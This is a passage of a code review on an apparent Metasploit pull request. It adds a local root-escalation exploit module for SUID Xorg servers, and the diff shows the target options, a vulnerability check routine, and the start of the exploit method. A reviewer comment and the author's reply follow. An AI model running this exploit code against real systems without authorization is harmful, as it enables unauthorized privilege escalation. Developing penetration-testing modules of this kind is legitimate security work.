modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb

```diff
@@ -0,0 +1,204 @@
+           ['Linux x64', {
+            'Platform' => 'linux',
+            'Arch' => [ ARCH_X64] } ],
+           ['Linux x86', {
+            'Platform' => 'linux',
+            'Arch' => [ ARCH_X86] } ]
+        ],
+      'DefaultTarget'  => 0))
+
+     register_advanced_options(
+       [
+         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+         OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
+         OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]),
+         OptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ])
+       ]
+     )
+  end
+
+
+  def check
+
+    # linux checks
+    uname = cmd_exec "uname"
+    if uname =~ /linux/i
+      vprint_status "Running additional check for Linux"
+      if datastore['ConsoleLock']
+        user = cmd_exec "id -un"
+        unless exist? "/var/run/console/#{user}"
+          vprint_error "No console lock for #{user}"
+          return CheckCode::Safe
+        end
+        vprint_good "Console lock for #{user}"
+      end
+    end
+
+    # suid program check
+    xorg_path = cmd_exec "command -v Xorg"
+    unless xorg_path.include?("Xorg")
+      vprint_error "Could not find Xorg executable"
+      return CheckCode::Safe
+    end
+    vprint_good "Xorg path found at #{xorg_path}"
+    unless setuid? xorg_path
+      vprint_error "Xorg binary #{xorg_path} is not SUID"
+      return CheckCode::Safe
+    end
+    vprint_good "Xorg binary #{xorg_path} is SUID"
+
+    # version check
+    x_version = cmd_exec "Xorg -version"
+    if x_version.include?("Release Date")
+      v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
+      unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
+        vprint_error "Xorg version #{v} not supported"
+        return CheckCode::Safe
+      end
+    elsif x_version.include?("Fatal server error")
+      vprint_error "User probably does not have console auth"
+      vprint_error "Below is Xorg -version output"
+      vprint_error x_version
+      return CheckCode::Safe
+    else
+      vprint_warning "Could not parse Xorg -version output"
+      return CheckCode::Appears
+    end
+    vprint_good "Xorg version #{v} is vulnerable"
+
+    # process check for /X
+    proc_list = cmd_exec "ps ax"
+    if proc_list.include?('/X ')
+      vprint_warning('Xorg in process list')
+      return CheckCode::Appears
+    end
+    vprint_good('Xorg does not appear running')
+    return CheckCode::Vulnerable
+  end
+
+
+  def exploit
+
+    check_status = check
+    if check_status == CheckCode::Appears
+      print_warning 'Could not get version or Xorg process possibly running, may fail'
+    elsif check_status ==  CheckCode::Safe
+      fail_with Failure::NotVulnerable, 'Target not vulnerable'
+    end
+
+    unless has_gcc?
+      vprint_error 'gcc is not installed'
+      return CheckCode::Safe
```

Comment:
See comments about Metasm. `gcc` is not required. Also, a `CheckCode` should not be returned from the `exploit` method. Use `fail_with` instead.

Reply:
I learned that from last time, was just hurrying to get a WIP PR up and see if it worked.  I changed it.